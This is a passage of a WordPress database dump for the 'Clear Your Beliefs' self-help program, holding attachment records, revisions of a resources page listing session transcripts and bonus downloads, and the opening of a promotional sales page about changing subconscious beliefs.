(1020, 2, '2014-06-18 15:08:04', '2014-06-18 20:08:04', '', 'CYB-2', '', 'inherit', 'closed', 'open', '', 'cyb-2', '', '', '2014-06-18 15:08:04', '2014-06-18 20:08:04', '', 139, 'http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf', 0, 'attachment', 'application/pdf', 0),
(1021, 2, '2014-06-18 15:08:07', '2014-06-18 20:08:07', '', 'CYB-1', '', 'inherit', 'closed', 'open', '', 'cyb-1', '', '', '2014-06-18 15:08:07', '2014-06-18 20:08:07', '', 139, 'http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf', 0, 'attachment', 'application/pdf', 0),
(1022, 2, '2014-06-18 15:19:34', '2014-06-18 20:19:34', '<h1 style="text-align: center;">Thank you for registering for the\r\n<em>Clear Your Beliefs Program</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "Recommended Course Flow" for suggestions on taking yourself through the program.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\n&nbsp;\r\n\r\nLion Goodman\r\nFounder\r\n\r\n&nbsp;\r\n<h6>Audio Recordings:</h6>\r\n&nbsp;\r\n<h6><strong>Transcripts:</strong>\r\nSession 1: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1</a>\r\nSession 2: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a>\r\nSession 3: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\nSession 4: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\nSession 5: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\nSession 6: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\nSession 7: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\nBonus Call 1 with Carista Luminare: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a>\r\nBonus Call 2 with Anodea Judith: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a></h6>\r\n&nbsp;\r\n<h6>Bonus Materials:</h6>\r\nTake the LoveStyle Profile Quiz by clicking <a href="www.ConfusedAboutLove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n\r\nDownload the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>.   Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-18 15:19:34', '2014-06-18 20:19:34', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(1023, 2, '2014-06-18 15:28:05', '2014-06-18 20:28:05', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>the</em> <em>Clear Your Beliefs Program</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "Recommended Course Flow" for suggestions on taking yourself through the program.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\nLion Goodman\r\nFounder\r\n\r\n&nbsp;\r\n<h6>Audio Recordings:</h6>\r\n&nbsp;\r\n<h6><strong>Transcripts:</strong>\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\nSession 2:  Clear Your Negative Beliefs About Who You Are\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a>\r\n\r\nSession 3: Clear Your Limiting Beliefs About Your Capabilities\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\nSession 4: Clear Your Outdated Beliefs About Love &amp; Relationship\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\nSession 5: Clear Your Old Beliefs About Money and Work\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\nSession 6: Clear Uncomfortable Beliefs About Your Body &amp; Health\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\nSession 7: Clear Out the Rest of the Junk in Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a></h6>\r\n<h6>Bonus Call with Carista Luminare, Ph.D.:  What Makes Love So Confusing?            Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL\r\n\r\n</a>Bonus Call with Anodea Judith, Ph.D: The Spiritual Technology of Manifesting         Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a></h6>\r\n&nbsp;\r\n<h6>Bonus Materials:</h6>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="www.ConfusedAboutLove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-18 15:28:05', '2014-06-18 20:28:05', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(1024, 2, '2014-06-18 15:30:52', '2014-06-18 20:30:52', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>the</em> <em>Clear Your Beliefs Program</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "Recommended Course Flow" for suggestions on taking yourself through the program.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\nLion Goodman\r\nFounder\r\n\r\n&nbsp;\r\n<h6>Audio Recordings:</h6>\r\n&nbsp;\r\n<h6><strong>Transcripts:</strong>\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\nSession 2:  Clear Your Negative Beliefs About Who You Are\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a></h6>\r\nSession 3: Clear Your Limiting Beliefs About Your Capabilities\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\nSession 4: Clear Your Outdated Beliefs About Love &amp; Relationship\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\nSession 5: Clear Your Old Beliefs About Money and Work\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\nSession 6: Clear Uncomfortable Beliefs About Your Body &amp; Health\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\nSession 7: Clear Out the Rest of the Junk in Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n<h6>Bonus Call with Carista Luminare, Ph.D.:  What Makes Love So Confusing?            Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a></h6>\r\n&nbsp;\r\n<h6>Bonus Call with Anodea Judith, Ph.D: The Spiritual Technology of Manifesting         Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a></h6>\r\n&nbsp;\r\n<h6>Bonus Materials:</h6>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-18 15:30:52', '2014-06-18 20:30:52', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(1025, 2, '2014-06-18 15:41:23', '2014-06-18 20:41:23', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>the</em> <em>Clear Your Beliefs Program</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "Recommended Course Flow" for suggestions on taking yourself through the program.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\nLion Goodman\r\nFounder\r\n\r\n&nbsp;\r\n<h6>Audio Recordings:</h6>\r\n&nbsp;\r\n<h6><strong>Transcripts:</strong>\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\nSession 2:  Clear Your Negative Beliefs About Who You Are\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a></h6>\r\nSession 3: Clear Your Limiting Beliefs About Your Capabilities\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\nSession 4: Clear Your Outdated Beliefs About Love &amp; Relationship\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\nSession 5: Clear Your Old Beliefs About Money and Work\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\nSession 6: Clear Uncomfortable Beliefs About Your Body &amp; Health\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\nSession 7: Clear Out the Rest of the Junk in Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n<h6>Bonus Call with Carista Luminare, Ph.D.:  What Makes Love So Confusing?            Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a></h6>\r\n&nbsp;\r\n<h6>Bonus Call with Anodea Judith, Ph.D: The Spiritual Technology of Manifesting         Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a></h6>\r\n&nbsp;\r\n<h6>Bonus Materials:</h6>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)\r\n\r\nOnce you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-18 15:41:23', '2014-06-18 20:41:23', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(1026, 2, '2014-06-18 16:46:57', '2014-06-18 21:46:57', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "Recommended Course Flow" for suggestions on taking yourself through the program.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\nLion Goodman\r\nFounder\r\n\r\n&nbsp;\r\n<h6>Audio Recordings:</h6>\r\n&nbsp;\r\n<h6><strong>Transcripts:</strong>\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\nSession 2:  Clear Your Negative Beliefs About Who You Are\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a></h6>\r\nSession 3: Clear Your Limiting Beliefs About Your Capabilities\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\nSession 4: Clear Your Outdated Beliefs About Love &amp; Relationship\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\nSession 5: Clear Your Old Beliefs About Money and Work\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\nSession 6: Clear Uncomfortable Beliefs About Your Body &amp; Health\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\nSession 7: Clear Out the Rest of the Junk in Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n<h6>Bonus Call with Carista Luminare, Ph.D.:  What Makes Love So Confusing?            Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a></h6>\r\n&nbsp;\r\n<h6>Bonus Call with Anodea Judith, Ph.D: The Spiritual Technology of Manifesting         Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a></h6>\r\n&nbsp;\r\n<h6>Bonus Materials:</h6>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)\r\n\r\nOnce you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-18 16:46:57', '2014-06-18 21:46:57', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1027, 2, '2014-06-18 16:48:06', '2014-06-18 21:48:06', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know 